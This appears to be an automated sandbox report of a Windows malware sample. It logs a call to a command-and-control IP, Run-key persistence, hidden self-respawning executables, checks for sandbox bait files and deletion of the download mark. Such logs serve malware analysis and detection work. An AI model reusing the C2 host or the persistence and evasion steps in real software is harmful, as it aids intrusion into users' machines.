| Inet | Open Connection | protocol = HTTP, server_name = 74.208.155.175, server_port = 8080, user_name = 0, password = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = 0 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 62036, size_out = 62036 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 94208 |
|
1 | |
| Process | Create | process_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, os_pid = 0xbdc, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 | |
| System | Get Time | type = Ticks, time = 101119 |
|
1 | |
| System | Get Time | type = Ticks, time = 101915 |
|
1 | |
| System | Get Time | type = Ticks, time = 102945 |
|
1 | |
| System | Get Time | type = Ticks, time = 103927 |
|
1 | |
| System | Get Time | type = Ticks, time = 104926 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 98857 |
|
1 | |
| System | Get Time | type = Ticks, time = 99856 |
|
1 | |
| System | Get Time | type = Ticks, time = 100901 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 97859 |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:17 |
| Information | Value |
|---|---|
| PID | 0xbdc |
| Parent PID | 0xb04 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE0
0x
BE4
0x
BE8
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = USER32.dll, base_address = 0x76890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = ReleaseCapture, address_out = 0x768c69f2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetProcessWindowStation, address_out = 0x7689dfdc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef63c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef65c |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2ef73c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2ef73c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef73c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2ef73c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef73c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef73c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef73c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x772a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x772e7690 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, base_address = 0xc40000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MB66D4A35 |
|
1 | |
| Process | Create | process_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, os_pid = 0xbec, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:10, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:15 |
| Information | Value |
|---|---|
| PID | 0xbec |
| Parent PID | 0xbdc (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BF0
0x
BF4
0x
BF8
0x
BFC
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = USER32.dll, base_address = 0x76890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = ReleaseCapture, address_out = 0x768c69f2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetProcessWindowStation, address_out = 0x7689dfdc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef59c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef5bc |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2ef69c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2ef69c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef69c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2ef69c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef69c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef69c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef69c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x772a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x772e7690 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, base_address = 0xc40000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MB66D4A35 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x77140000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x755b0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74af0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74180000 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, type = size |
|
1 | |
| Module | Unmap | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Mutex | Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Mutex | Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Mutex | Release | mutex_name = Global\I78B95E2E |
|
1 | |
| System | Get Time | type = Ticks, time = 104973 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 105987 |
|
1 | |
| System | Get Time | type = Ticks, time = 106985 |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\, type = file_attributes |
|
1 | |
| File | Move | source_filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, destination_filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe |
|
1 | |
| File | Delete | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe:Zone.Identifier |
|
1 | |
| Process | Create | process_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, os_pid = 0xc04, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:11 |
| Information | Value |
|---|---|
| PID | 0xc04 |
| Parent PID | 0xbec (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C08
0x
C10
0x
C14
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = USER32.dll, base_address = 0x76890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = ReleaseCapture, address_out = 0x768c69f2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetProcessWindowStation, address_out = 0x7689dfdc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x1cf74c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x1cf76c |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x1cf84c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x1cf84c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x1cf84c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x1cf84c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x1cf84c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x1cf84c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x1cf84c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x772a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x772e7690 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe, base_address = 0xc40000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MA991ED3B |
|
1 | |
| Process | Create | process_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, os_pid = 0xc18, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:16, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:09 |
| Information | Value |
|---|---|
| PID | 0xc18 |
| Parent PID | 0xc04 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C1C
0x
C20
0x
C24
0x
C28
0x
C2C
0x
C30
0x
C34
0x
C38
0x
C3C
0x
C40
0x
C44
0x
C48
0x
C4C
0x
C60
0x
C70
0x
C74
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\c570.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\c571.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\c572.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\c572.tmp | 0.11 KB (112 bytes) |
MD5:
f10107805ff54bb9c1e1cb047b604439
SHA1: 787f5296c509df55e9dea0f22ea76afaa8953676 SHA256: f4a00adb6eeaf4985068b04cb755ecb8874f7e4fbdd7c8630b0ba96c99b63a68 |
|
|
| c:\programdata\c571.tmp | 0.11 KB (112 bytes) |
MD5:
36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = USER32.dll, base_address = 0x76890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = ReleaseCapture, address_out = 0x768c69f2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetProcessWindowStation, address_out = 0x7689dfdc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2cf31c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2cf33c |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2cf41c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2cf41c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2cf41c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2cf41c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2cf41c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2cf41c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2cf41c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x772a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x772e7690 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
